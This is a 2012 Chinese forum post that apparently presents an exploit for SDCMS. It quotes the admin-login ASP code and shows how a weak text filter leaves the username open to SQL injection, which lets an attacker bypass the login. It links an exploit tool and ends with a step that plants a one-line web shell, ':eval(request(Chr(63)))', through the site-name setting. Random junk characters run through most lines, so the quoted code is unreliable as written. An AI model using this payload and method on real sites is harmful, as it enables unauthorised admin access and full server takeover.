作者:T00LS 鬼哥7 m9 f7 Y, T! `8 a# x5 ~" a
漏洞文件:后台目录/index.asp$ |' v, h* V" \* f) |
- r" W: q8 k- ^& L' ]$ MSub Check! _8 F5 P( G. D+ \1 U6 ^- }1 ]4 l
Dim username,password,code,getcode,Rs
/ Y" j! S- H# X% y0 H K* } IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
( Q) r; K. `4 ^ username=FilterText(Trim(Request.Form("username")),1)
1 R# l9 N4 m0 k% x% T# q password=FilterText(Trim(Request.Form("password")),1); v7 ]( S" S5 w& m1 w9 t
code=Trim(Request.Form("yzm"))7 \% o: N E4 ?/ b7 X6 r
getcode=Session("SDCMSCode")
8 g- \9 `4 z; r7 c" r# m0 w, D" m- I IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
6 F. ^' w+ `' i) \0 Y6 e, h0 _! X1 M IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
: b, X& M) ^0 P% X* ?; Y( [* r& X IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied/ Z9 J, d3 J0 }0 p1 X' }
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied% N/ T! y7 k7 ~2 o3 p' W1 K
IF username="" or password="" Then
2 e4 E6 [% d' s3 V2 N4 b& r Echo "用户名或密码不能为空"ied
' F2 J2 h( Y' i4 }6 a/ N Else9 `6 T$ ~# y+ F' \# u- g
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
; U8 y$ r# B$ |" J IF Rs.Eof Then
& Z3 V# E0 v4 @ i AddLog username,GetIp,"登录失败",1! i9 x" |3 ^0 t/ z( d$ i
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"" c" l" ]' q) g. v$ J
Else7 j5 q2 A; c/ y1 t
Add_Cookies "sdcms_id",Rs(0)
0 j4 n8 T/ t$ ^, s- f2 M Add_Cookies "sdcms_name",username
4 e& y5 ^% |. \. E) i: D Add_Cookies "sdcms_pwd",Rs(2): z6 s5 N3 Z- b1 u% h( `/ P
Add_Cookies "sdcms_admin",Rs(3)6 ?$ M! R5 A5 c
Add_Cookies "sdcms_alllever",Rs(4)/ Z* ?/ Z: U5 A. m* N0 w
Add_Cookies "sdcms_infolever",Rs(5)$ W) J8 i0 q! j! \8 [
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
) C9 k0 g1 h/ E$ e% q$ g& V2 l5 y AddLog username,GetIp,"登录成功",1/ [8 D X/ t/ v5 F& ?
'自动删除30天前的Log记录: G2 {+ U* L0 {# R
IF Sdcms_DataType Then* }4 W& Y @" u$ m0 l
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")2 v8 I p+ A' R- ?+ N
Else) X; }; j5 |( g( W: w( Y6 R
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
* Y. a# `3 L7 c, A8 C, e7 d End IF' x: Z3 g; M4 r: a, A( C& W; r# b
Go("sdcms_index.asp")4 r9 k7 z: z# I, d, k+ g: o
End IF7 h0 y. r6 `6 w( U* ~6 L
Rs.Close
4 H8 Q, X; c6 w3 I9 W Set Rs=Nothing/ x& a1 _7 W4 H. t) y4 F7 v
End IF
- n! K# T9 \- R) f! xEnd Sub1 @, q: c1 z' x0 `3 N8 e% }6 g: o
; |4 J/ v: _9 Q9 }% M, \9 G’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
4 N. h7 H4 X$ P/ a
, U2 d( F2 e5 _: a/ r k# z, K" AFunction FilterText(ByVal t0,ByVal t1)
$ u% M0 y1 R Q2 Q! A IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
D: T) m! V! j- r' ~ t0=Trim(t0)
2 U4 b% u* W P2 h$ @' ^ Select Case t1
. i6 M4 K( {0 q2 ~1 U) V% |2 J, A3 F Case "1"4 H5 U/ n) Z5 k
t0=Replace(t0,Chr(32),"")
3 Z+ V- Z+ g$ b t0=Replace(t0,Chr(13),""). Q; p) |4 l% _& ~! [5 Y
t0=Replace(t0,Chr(10)&Chr(10),"")
5 q. i% U5 _+ C6 M6 d" F t0=Replace(t0,Chr(10),"")
8 \4 ]' y6 C' o P. u( l$ y Case "2" F9 Q) t' c: y4 V3 e
t0=Replace(t0,Chr(8),"")'回格 y& t* @' C3 A. V. c) K
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
2 Z2 |0 o3 I7 d, s t0=Replace(t0,Chr(10),"")'换行+ g. c: V% s; t' z* N# _9 f; _8 o
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)) y$ ?& o& [/ o, B, e o
t0=Replace(t0,Chr(12),"")'换页
" V) D# x( {4 u# _ t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合& D5 `6 K) C( p
t0=Replace(t0,Chr(22),"")2 Y' ^: L% k" i+ t/ y
t0=Replace(t0,Chr(32),"")'空格 SPACE( m5 U" L0 T3 I C; V
t0=Replace(t0,Chr(33),"")'!* \- _- F' b$ v! V, O5 z
t0=Replace(t0,Chr(34),"")'"
; [, h" d; L T3 H t0=Replace(t0,Chr(35),"")'#
8 t, x6 ?4 E1 h- s0 x" d t0=Replace(t0,Chr(36),"")'$
- l; u- j0 E1 E2 Q. j# C t0=Replace(t0,Chr(37),"")'%
2 L! E* j) n! T9 s1 Y t0=Replace(t0,Chr(38),"")'& F/ v- ]% c; q. d
t0=Replace(t0,Chr(39),"")''
) o3 T1 K5 A- O" |9 K t0=Replace(t0,Chr(40),"")'(
% V6 b* B; r3 N2 r t0=Replace(t0,Chr(41),"")')9 v, y! P7 R8 ^7 J3 I6 L
t0=Replace(t0,Chr(42),"")'*
3 }0 s6 H" P) G6 j2 A5 ^3 V t0=Replace(t0,Chr(43),"")'+
' M. N A& b# _' i' O4 E( r* R t0=Replace(t0,Chr(44),"")',$ w! K, j, t5 L% I; K
t0=Replace(t0,Chr(45),"")'-
; O- C9 J7 P6 b- I# d* [) n t0=Replace(t0,Chr(46),"")'.
I1 e d* P6 b. D0 B z0 \ t0=Replace(t0,Chr(47),"")'/
3 b+ a+ d+ G3 w! \6 N t0=Replace(t0,Chr(58),"")':
, q% t; n: ]' z7 J/ e% O3 x( u, z t0=Replace(t0,Chr(59),"")';
3 a+ W1 B- m! ~: L* E) o t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>- L1 C; Q4 ?0 y4 r$ X# z8 L3 d
t0=Replace(t0,Chr(63),"")'?
* Y( z; t0 ` j) l5 H7 j t0=Replace(t0,Chr(64),"")'@
" X: C' _* Q. w( E& W+ ~ t0=Replace(t0,Chr(91),"")'\
$ |. I Q* U* c2 `1 ~' [ t0=Replace(t0,Chr(92),"")'\
! G0 e8 j7 a- {% S( \& M t0=Replace(t0,Chr(93),"")']
! I/ |. [& \ r; i% i7 e t0=Replace(t0,Chr(94),"")'^
' \' k6 P, ^6 ~5 u t0=Replace(t0,Chr(95),"")'_
! b9 o! W+ R( o O t0=Replace(t0,Chr(96),"")'`
5 v! d2 d7 L4 J t0=Replace(t0,Chr(123),"")'{0 d( K2 `3 B: w$ _8 @3 K
t0=Replace(t0,Chr(124),"")'|
- u% I [8 c, k4 w' t5 G/ h t0=Replace(t0,Chr(125),"")'}
' j2 l, F8 g- H( w. t t0=Replace(t0,Chr(126),"")'~
/ D- F5 `: r/ g y Case Else
, a8 \2 [* C9 d& N# y! E, F t0=Replace(t0, "&", "&")" r9 }; [$ |& q8 o. a: \
t0=Replace(t0, "'", "'")
! b5 U, m& `/ M/ w0 ` t0=Replace(t0, """", """)
4 D. }* I- n1 ~; B9 S t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
- ^7 |- |( ^, b) X4 _ End Select
. m9 i9 B5 T3 G2 A8 U IF Instr(Lcase(t0),"expression")>0 Then2 U: q/ E/ v" C9 h# U& [7 x
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
9 H9 R6 C% }% R# [! B( K! z+ H9 \ End If
7 H; S6 ]3 Z- x+ T FilterText=t0; g4 o* e$ R/ q
End Function
& ^* ?6 e; ~5 `* I
; X& { U# }, C) Z看到没。直接参数是1 只过滤4 \# |5 b9 r7 o2 Q: L( q" C
t0=Replace(t0,Chr(32)," ")
5 i. x% x6 K; ]& | t0=Replace(t0,Chr(13),"")2 |. ?; G: c1 r3 S: j0 O( S% r3 [
t0=Replace(t0,Chr(10)&Chr(10),"
& B! Y2 V. z/ u k")
# w2 x. o0 l# @( j4 d o t0=Replace(t0,Chr(10),"
% L# E! C8 c7 p3 k1 f")
$ M* { v8 v& \' a4 W7 A. f- A) ^漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
2 ]* n% g2 M8 x, tEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP7 g( W- C2 q+ m2 v7 m6 q! o
1 ?# r. X# N( L# }4 E* T
测试:
( Z+ N) s3 B% H: G- ]0 o# U) Y) W* K. ~) T9 D
3 K! k3 ?8 ?" F3 a( k现在输入工具上验证码,然后点OK
; G4 R4 c+ n3 Z
8 e, U' @( @7 s1 V- p. T0 F, u' b2 ^2 ^; n6 P, O, D, T
看到我们直接进入后台管理界面了,呵呵!% f5 G2 G1 n0 O I" I, e5 t, M- S
) h) j% j1 g+ o* K! K
4 J5 [. y: J7 r; W' S, \1 N- u
& M9 o( N( f, |* Z4 Q6 `9 V这样直接进入后台了。。。。' V1 r, R8 @$ ~
1 ?6 @% l, V( v! |
+ C4 m0 k- S! { h% g$ r1 A6 n, p. A2 h. k f, x8 F$ i1 p
SDCMS提权:3 u3 s; f; \. h# n
: T$ k, j8 R5 H2 O8 O
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
; ~4 J. Q% b4 G8 X% e7 K; h8 _8 n& O1 U0 \* C w' j; P
' a/ N! E: \& a4 I* i' [
; ^6 e0 g9 p9 M- kOK,现在用菜刀连接下!
% l% j$ a0 D3 P9 E( e" p$ i. K3 ?# z, D' N" u
2 U7 A) t! A& N& u$ P- K% a& w7 y, }$ a
7 i3 K# A( W2 E ) c0 {1 I, l) U( h' h; D! j# i3 D. \
5 M- T$ B/ d. b% J0 M# l4 Z; Z |
发表于 2012-11-9 20:57:02
收藏
支持
反对